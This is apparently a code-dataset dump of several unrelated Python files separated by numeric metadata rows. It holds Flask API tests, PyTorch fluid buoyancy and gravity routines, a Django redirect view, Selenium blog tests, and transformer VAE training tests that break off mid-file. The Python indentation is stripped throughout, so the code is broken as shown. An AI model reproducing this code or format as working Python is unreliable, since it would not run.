dev3_handle = 'krasty'
dev4_handle = 'bart'
dev3_twitter_id = '3'
dev4_twitter_id = '4'
twitter_dev3: TwitterDeveloper = TwitterDeveloper(dev3_handle, id=dev3_twitter_id)
twitter_dev4: TwitterDeveloper = TwitterDeveloper(dev4_handle, id=dev4_twitter_id)
twitter_dev3.followers.append(twitter_dev4.id)
organisation_name_dev3 = "TV Show"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev3: GitHubDeveloper = GitHubDeveloper(dev3_handle)
github_dev3.organisations.append(organisation)
github_dev4: GitHubDeveloper = GitHubDeveloper(dev4_handle)
twitter_devs_not_connected = [twitter_dev3, twitter_dev4]
github_devs_not_connected = [github_dev3, github_dev4]
twitter_devs_not_connected_iter = (i for i in range(len(twitter_devs_not_connected)))
github_devs_not_connected_iter = (i for i in range(len(github_devs_not_connected)))
@pytest.fixture(scope='function')
def reset_db(self):
db.drop_all()
db.create_all()
def mock_twitter_get_user_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_connected_iter)
except StopIteration as _:
self.twitter_devs_connected_iter = (i for i in range(len(self.twitter_devs_connected)))
idx = next(self.twitter_devs_connected_iter)
return self.twitter_devs_connected[idx]
def mock_github_user_user_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_connected_iter)
except StopIteration as _:
self.github_devs_connected_iter = (i for i in range(len(self.github_devs_connected)))
idx = next(self.github_devs_connected_iter)
return self.github_devs_connected[idx]
def mock_twitter_get_user_not_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_not_connected_iter)
except StopIteration as _:
self.twitter_devs_not_connected_iter = (i for i in range(len(self.twitter_devs_not_connected)))
idx = next(self.twitter_devs_not_connected_iter)
return self.twitter_devs_not_connected[idx]
def mock_github_user_user_not_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_not_connected_iter)
except StopIteration as _:
self.github_devs_not_connected_iter = (i for i in range(len(self.github_devs_not_connected)))
idx = next(self.github_devs_not_connected_iter)
return self.github_devs_not_connected[idx]
def mock_twitter_get_user_not_found(self, handle, *ignored_arg):
raise InvalidHandleError(f"{handle} is no a valid user in twitter")
def mock_github_get_user_not_found(self, handle, *ignored_arg):
raise InvalidHandleError(f"{handle} is no a valid user in github")
def test_register_response_200_ok_connected(self, monkeypatch, client: FlaskClient, reset_db: None):
expected_response = [{'connected': True,
'organisations': ['Nuclear Plant'],
'registered_at': '2022-02-06T13:18:37Z'}]
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
_ = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
response = register(self.dev1_handle, self.dev2_handle)
response_cleaned = remove_registered_at(response.json)
expected_response_cleaned = remove_registered_at(expected_response)
assert response.status_code == 200
assert response_cleaned == expected_response_cleaned
def test_realtime_response_200_ok_not_connected(self, monkeypatch, client: FlaskClient):
expected_response = [{'connected': False, 'registered_at': '2022-02-06T13:18:37Z'}]
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_not_connected)
_ = client.get(self.realtime_uri.format(self.dev3_handle, self.dev4_handle))
response = register(self.dev3_handle, self.dev4_handle)
response_cleaned = remove_registered_at(response.json)
expected_response_cleaned = remove_registered_at(expected_response)
assert response.status_code == 200
assert response_cleaned == expected_response_cleaned
| 49.090909 | 107 | 0.720576 | 1,821 | 14,580 | 5.42559 | 0.101043 | 0.051012 | 0.051822 | 0.02753 | 0.871154 | 0.852834 | 0.85 | 0.832996 | 0.818117 | 0.811538 | 0 | 0.01977 | 0.19513 | 14,580 | 296 | 108 | 49.256757 | 0.822156 | 0.028052 | 0 | 0.763485 | 0 | 0 | 0.071817 | 0.005014 | 0 | 0 | 0 | 0 | 0.049793 | 1 | 0.082988 | false | 0 | 0.049793 | 0 | 0.431535 | 0.004149 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bf5260186446ead5d89f7365e6e02b60b92f1b19 | 12,702 | py | Python | neural_models/architectures/old_fnet/source_terms.py | ajupatatero/neurasim | c1d3f8163a7389b06a13e453daa98ad5157d9b2e | [
"MIT"
] | null | null | null | neural_models/architectures/old_fnet/source_terms.py | ajupatatero/neurasim | c1d3f8163a7389b06a13e453daa98ad5157d9b2e | [
"MIT"
] | null | null | null | neural_models/architectures/old_fnet/source_terms.py | ajupatatero/neurasim | c1d3f8163a7389b06a13e453daa98ad5157d9b2e | [
"MIT"
] | null | null | null | import torch
from . import CellType
from . import getDx
def addBuoyancy(U, flags, density, gravity, rho_star, dt):
r"""Add buoyancy force.
Arguments:
U (Tensor): velocity field (size(2) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
density (Tensor): scalar density grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5 and density.dim() == 5,\
"Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert density.is_same_size(flags), "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous() and \
density.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3, \
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
strength = gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.cuda().float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__\
(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
isFluid = flags.eq(CellType.TypeFluid).__and__(mCont)
mCont.masked_fill_(isFluid.ne(1), 0)
mCont.squeeze_(1)
max_X = torch.zeros_like(zero).fill_(w-1)
max_Y = torch.zeros_like(zero).fill_(h-1)
i_l = zero.where( (i <= 0), i-1)
i_r = max_X.where( (i > w-2), i+1)
j_l = zero.where( (j <= 0), j-1)
j_r = max_Y.where( (j > h-2), j+1)
rho_star = rho_star
fluid100 = flags[idx_b, zero, k, j, i_l].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j, i_r].eq(CellType.TypeFluid)).__and__ \
factor = strength[0] * ((0.5* \
(density[idx_b, zero, k, j, i] +
density[idx_b, zero, k, j, i_l] ) - rho_star))
U[:,0].masked_scatter_(fluid100, (U.select(1,0) + factor).masked_select(fluid100))
fluid010 = flags[idx_b, zero, k, j_l, i].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j_r, i].eq(CellType.TypeFluid)).__and__ \
#fluid010 = zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[1] * ((0.5* \
((density[idx_b, zero, k, j, i] +
density[idx_b, zero, k, j_l, i] ) )- rho_star))
#factor = strength[1] * (density.squeeze(1) - \
# zero_f.where( j <= 0, density[idx_b, zero, k, j-1, i]) )
U[:,1].masked_scatter_(fluid010, (U.select(1,1) + factor).masked_select(fluid010))
if (is3D):
fluid001 = zeroBy.where( j <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[2] *(0.5* (density.squeeze(1) + \
zero_f.where(k <= 1, density[idx_b, zero, k-1, j, i]) ))
U[:,2].masked_scatter_(fluid001, (U.select(1,2) + factor).masked_select(fluid001))
return U
# *****************************************************************************
# addNew_SourceTerm
# *****************************************************************************
def addBuoyancy_NewSourceTerm(U, flags, density, gravity, rho_star, dt):
r"""Add buoyancy force.
Arguments:
U (Tensor): velocity field (size(2) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
density (Tensor): scalar density grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5 and density.dim() == 5,\
"Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
ch = flags.size(1)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert density.is_same_size(flags), "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous() and \
density.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3, \
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
strength = -gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
# Altitude!
h_alt = torch.arange(0, h, dtype=torch.float, device=cuda).view(1,h,1).expand(bsz, ch,d, h, w)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.cuda().float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__\
(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
isFluid = flags.eq(CellType.TypeFluid).__and__(mCont)
mCont.masked_fill_(isFluid.ne(1), 0)
mCont.squeeze_(1)
max_X = torch.zeros_like(zero).fill_(w-1)
max_Y = torch.zeros_like(zero).fill_(h-1)
i_l = zero.where( (i <= 0), i-1)
i_r = max_X.where( (i > w-2), i+1)
j_l = zero.where( (j <= 0), j-1)
j_r = max_Y.where( (j > h-2), j+1)
fluid100 = flags[idx_b, zero, k, j, i_l].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j, i_r].eq(CellType.TypeFluid)).__and__ \
#factor = strength[0] * ((density[idx_b, zero, k, j, i] -\
# density[idx_b, zero, k, j, i_l] ))
factor = 0.0
U[:,0].masked_scatter_(fluid100, (U.select(1,0) + factor).masked_select(fluid100))
fluid010 = flags[idx_b, zero, k, j_l, i].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j_r, i].eq(CellType.TypeFluid)).__and__ \
#fluid010 = zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[1] * (h_alt*(density[idx_b, zero, k, j, i] -\
density[idx_b, zero, k, j_l, i] ))
#factor = strength[1] * (density.squeeze(1) - \
# zero_f.where( j <= 0, density[idx_b, zero, k, j-1, i]) )
U[:,1].masked_scatter_(fluid010, (U.select(1,1) + factor).masked_select(fluid010))
if (is3D):
fluid001 = zeroBy.where( j <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[2] *(0.5* (density.squeeze(1) + \
zero_f.where(k <= 1, density[idx_b, zero, k-1, j, i]) ))
U[:,2].masked_scatter_(fluid001, (U.select(1,2) + factor).masked_select(fluid001))
return U
# *****************************************************************************
# addGravity
# *****************************************************************************
def addGravity(U, flags, gravity, dt):
r"""Add gravity force.
Arguments:
U (Tensor): velocity field (size(2) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5, "Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3,\
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
force = gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
cur_fluid = flags.eq(CellType.TypeFluid).__and__(mCont)
cur_empty = flags.eq(CellType.TypeEmpty).__and__(mCont)
mNotFluidNotEmpt = cur_fluid.ne(1).__and__(cur_empty.ne(1))
mCont.masked_fill_(mNotFluidNotEmpt, 0)
mCont.squeeze_(1)
#print()
#print('F = ')
#print(force)
#print('before')
#print(U)
#print(U.size())
fluid100 = (zeroBy.where( i <= 0, (flags[idx_b, zero, k, j, i-1].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( i <= 0, (flags[idx_b, zero, k, j, i-1].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1)))).__and__(mCont)
U[:,0].masked_scatter_(fluid100, (U[:,0] + force[0]).masked_select(fluid100))
fluid010 = (zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1))) ).__and__(mCont)
U[:,1].masked_scatter_(fluid010, (U[:,1] + force[1]).masked_select(fluid010))
if (is3D):
fluid001 = (zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1)))).__and__(mCont)
U[:,2].masked_scatter_(fluid001, (U[:,2] + force[2]).masked_select(fluid001))
#print('after')
#print(U)
#print(U.size())
return U
| 36.924419 | 111 | 0.575421 | 1,927 | 12,702 | 3.626881 | 0.078879 | 0.018887 | 0.03434 | 0.038632 | 0.931178 | 0.926599 | 0.907283 | 0.906711 | 0.898126 | 0.898126 | 0 | 0.039107 | 0.235002 | 12,702 | 343 | 112 | 37.03207 | 0.680148 | 0.206818 | 0 | 0.79602 | 0 | 0 | 0.060728 | 0 | 0 | 0 | 0 | 0 | 0.114428 | 1 | 0.014925 | false | 0 | 0.014925 | 0 | 0.044776 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bfb620a3d409f59b330f474b646fde26b141f217 | 180 | py | Python | properties/views.py | edilio/locator | da589ac28d0a8caa9f0700f746e2c1bafbec79f9 | [
"MIT"
] | null | null | null | properties/views.py | edilio/locator | da589ac28d0a8caa9f0700f746e2c1bafbec79f9 | [
"MIT"
] | null | null | null | properties/views.py | edilio/locator | da589ac28d0a8caa9f0700f746e2c1bafbec79f9 | [
"MIT"
] | null | null | null | # from django.shortcuts import render
from django.shortcuts import redirect
ADMIN_PATH = '/admin'
def home(request):
return redirect(request.build_absolute_uri(ADMIN_PATH))
| 20 | 59 | 0.788889 | 24 | 180 | 5.75 | 0.625 | 0.144928 | 0.275362 | 0.362319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127778 | 180 | 8 | 60 | 22.5 | 0.878981 | 0.194444 | 0 | 0 | 0 | 0 | 0.041958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
bfbe2ca1da7381d7fff337c8288c488422e86be6 | 100 | py | Python | aox/boilerplate/__init__.py | costas-basdekis/aox | 63a90fb722f29d9b2d26041f9035f99b6b21615e | [
"MIT"
] | 2 | 2021-11-10T22:38:49.000Z | 2021-12-03T08:09:01.000Z | aox/boilerplate/__init__.py | costas-basdekis/aox | 63a90fb722f29d9b2d26041f9035f99b6b21615e | [
"MIT"
] | null | null | null | aox/boilerplate/__init__.py | costas-basdekis/aox | 63a90fb722f29d9b2d26041f9035f99b6b21615e | [
"MIT"
] | null | null | null | from .base_boilerplate import * # noqa: F401, F403
from .boilerplates import * # noqa: F401, F403
| 33.333333 | 51 | 0.72 | 13 | 100 | 5.461538 | 0.615385 | 0.28169 | 0.394366 | 0.507042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 0.18 | 100 | 2 | 52 | 50 | 0.719512 | 0.33 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
44af19045c58f933bd90128459e09cb4e7656830 | 3,295 | py | Python | simpleblog/tests/test_functional_tests.py | blacktower2016/simpleblog | e0a7e79de7daf3774518a21f6e3c808e2fc79ec5 | [
"MIT"
] | null | null | null | simpleblog/tests/test_functional_tests.py | blacktower2016/simpleblog | e0a7e79de7daf3774518a21f6e3c808e2fc79ec5 | [
"MIT"
] | null | null | null | simpleblog/tests/test_functional_tests.py | blacktower2016/simpleblog | e0a7e79de7daf3774518a21f6e3c808e2fc79ec5 | [
"MIT"
] | null | null | null | from django.test import LiveServerTestCase
from selenium import webdriver
from django.urls import reverse
from django.utils.translation import activate, gettext_lazy as _
from .creation_utils import create_user, create_post
from simpleblog.models import Post
class TestPostCreate(LiveServerTestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.user = create_user()
#activate("en")
def test_log_in_and_create_new_post(self):
# user come to the simpleblog to create post
self.driver.get(self.live_server_url+reverse("simpleblog:create-post"))
self.assertEqual(Post.objects.count(), 0)
self.assertIn("<h2>Вход</h2>", self.driver.page_source)
# Oh, I forgot to log in!
self.driver.find_element_by_id("id_username").send_keys("user")
self.driver.find_element_by_id("id_password").send_keys("password")
self.driver.find_element_by_tag_name('button').click()
self.assertIn("user", self.driver.page_source)
# create post
self.driver.find_element_by_partial_link_text("Новая").click()
self.assertIn("Новая запись", self.driver.page_source)
self.driver.find_element_by_id("id_title").send_keys("New post title")
self.driver.find_element_by_id("id_subtitle").send_keys("New post subtitle")
self.driver.find_element_by_id("id_text").send_keys("New post text")
self.driver.find_element_by_id("id_tags").send_keys("New post tag")
self.driver.find_element_by_tag_name('button').click()
self.assertEqual(Post.objects.count(), 1)
def tearDown(self):
self.driver.quit()
pass
class TestPostUpdate(LiveServerTestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.user = create_user()
self.post = create_post(author=self.user, is_public=True)
#activate("en")
def test_log_in_and_update_post(self):
# user come to the simpleblog to create post
self.driver.get(self.live_server_url+reverse("simpleblog:create-post"))
self.assertEqual(Post.objects.count(), 1)
self.assertIn("<h2>Вход</h2>", self.driver.page_source)
# Oh, I forgot to log in!
self.driver.find_element_by_id("id_username").send_keys("user")
self.driver.find_element_by_id("id_password").send_keys("password")
self.driver.find_element_by_tag_name('button').click()
self.assertIn("user", self.driver.page_source)
# create post
self.driver.find_element_by_partial_link_text("Мои записи").click()
self.driver.find_element_by_class_name("fa-edit").click()
self.assertIn("<h2>Редактирование записи</h2>", self.driver.page_source)
self.driver.find_element_by_id("id_title").send_keys("New post title")
self.driver.find_element_by_id("id_subtitle").send_keys("New post subtitle")
self.driver.find_element_by_id("id_text").send_keys("New post text")
self.driver.find_element_by_id("id_tags").send_keys("New post tag")
self.driver.find_element_by_tag_name('button').click()
self.assertEqual(Post.objects.count(), 1)
def tearDown(self):
self.driver.quit()
pass
if __name__ == '__main__':
unittest.main()
| 37.022472 | 84 | 0.692261 | 457 | 3,295 | 4.71116 | 0.196937 | 0.143985 | 0.123549 | 0.185323 | 0.796098 | 0.784487 | 0.784022 | 0.760799 | 0.760799 | 0.760799 | 0 | 0.003717 | 0.183612 | 3,295 | 88 | 85 | 37.443182 | 0.796654 | 0.056449 | 0 | 0.660714 | 0 | 0 | 0.13544 | 0.014189 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.107143 | false | 0.071429 | 0.107143 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
153840c9d07281bd9a62285c58dd12e72d996485 | 170 | py | Python | landlab/utils/__init__.py | SiccarPoint/landlab | 4150db083a0426b3647e31ffa80dfefb5faa5a60 | [
"MIT"
] | 1 | 2015-08-17T19:29:50.000Z | 2015-08-17T19:29:50.000Z | landlab/utils/__init__.py | csherwood-usgs/landlab | 4f43055060b544b34e71eba7062c09866ad93640 | [
"MIT"
] | 1 | 2016-03-02T01:24:41.000Z | 2016-03-02T01:24:41.000Z | landlab/utils/__init__.py | csherwood-usgs/landlab | 4f43055060b544b34e71eba7062c09866ad93640 | [
"MIT"
] | 2 | 2017-07-03T20:21:13.000Z | 2018-09-06T23:58:19.000Z | #! /usr/bin/env
#import landlab.utils.count_repeats
#from landlab.utils.count_repeats import count_repeats
from landlab.utils.count_repeats import count_repeated_values
| 28.333333 | 61 | 0.847059 | 25 | 170 | 5.52 | 0.44 | 0.347826 | 0.369565 | 0.521739 | 0.702899 | 0.702899 | 0.702899 | 0.702899 | 0.702899 | 0 | 0 | 0 | 0.076471 | 170 | 5 | 62 | 34 | 0.878981 | 0.594118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 12 |
1539296a30ed70f8fcc703069de16edf4a3b0755 | 76 | py | Python | pyc3dserver/__init__.py | mkjung99/pyc3dserver | 97c5840aea72b786b990eb560de1da8a6dd78a44 | [
"MIT"
] | 6 | 2020-07-02T20:23:31.000Z | 2021-11-18T21:09:41.000Z | pyc3dserver/__init__.py | mkjung99/pyc3dserver | 97c5840aea72b786b990eb560de1da8a6dd78a44 | [
"MIT"
] | null | null | null | pyc3dserver/__init__.py | mkjung99/pyc3dserver | 97c5840aea72b786b990eb560de1da8a6dd78a44 | [
"MIT"
] | 2 | 2020-07-02T20:23:36.000Z | 2021-12-06T13:06:46.000Z | from .pyc3dserver import __author__, __version__
from .pyc3dserver import *
| 25.333333 | 48 | 0.828947 | 8 | 76 | 6.875 | 0.625 | 0.545455 | 0.763636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029851 | 0.118421 | 76 | 2 | 49 | 38 | 0.791045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ec61680a7281256ab4f61316440730330b340cad | 24,691 | py | Python | tests/test_train.py | Fraser-Greenlee/transformer-vae | 5e3666022cf53452206e071dd1355d24c93cfa8c | [
"MIT"
] | 64 | 2020-12-29T21:07:12.000Z | 2022-03-22T08:38:20.000Z | tests/test_train.py | Fraser-Greenlee/transformer-vae | 5e3666022cf53452206e071dd1355d24c93cfa8c | [
"MIT"
] | 6 | 2021-01-24T12:36:10.000Z | 2021-11-24T09:08:31.000Z | tests/test_train.py | Fraser-Greenlee/transformer-vae | 5e3666022cf53452206e071dd1355d24c93cfa8c | [
"MIT"
] | 7 | 2021-01-31T11:49:09.000Z | 2022-02-07T00:50:29.000Z | import logging
import sys
from unittest.mock import patch
import torch
from transformers.testing_utils import TestCasePlus, torch_device
from transformer_vae.train import main, VAE_Trainer
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
class TrainTests(TestCasePlus):
def test_train_txt(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 16
--n_latent_tokens 5
--latent_size 77
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_csv(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/multiline_max_len_4.csv
--validation_file ./tests/fixtures/multiline_max_len_4.csv
--do_train
--do_eval
--per_device_train_batch_size 5
--per_device_eval_batch_size 5
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_json(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/max_len_3.json
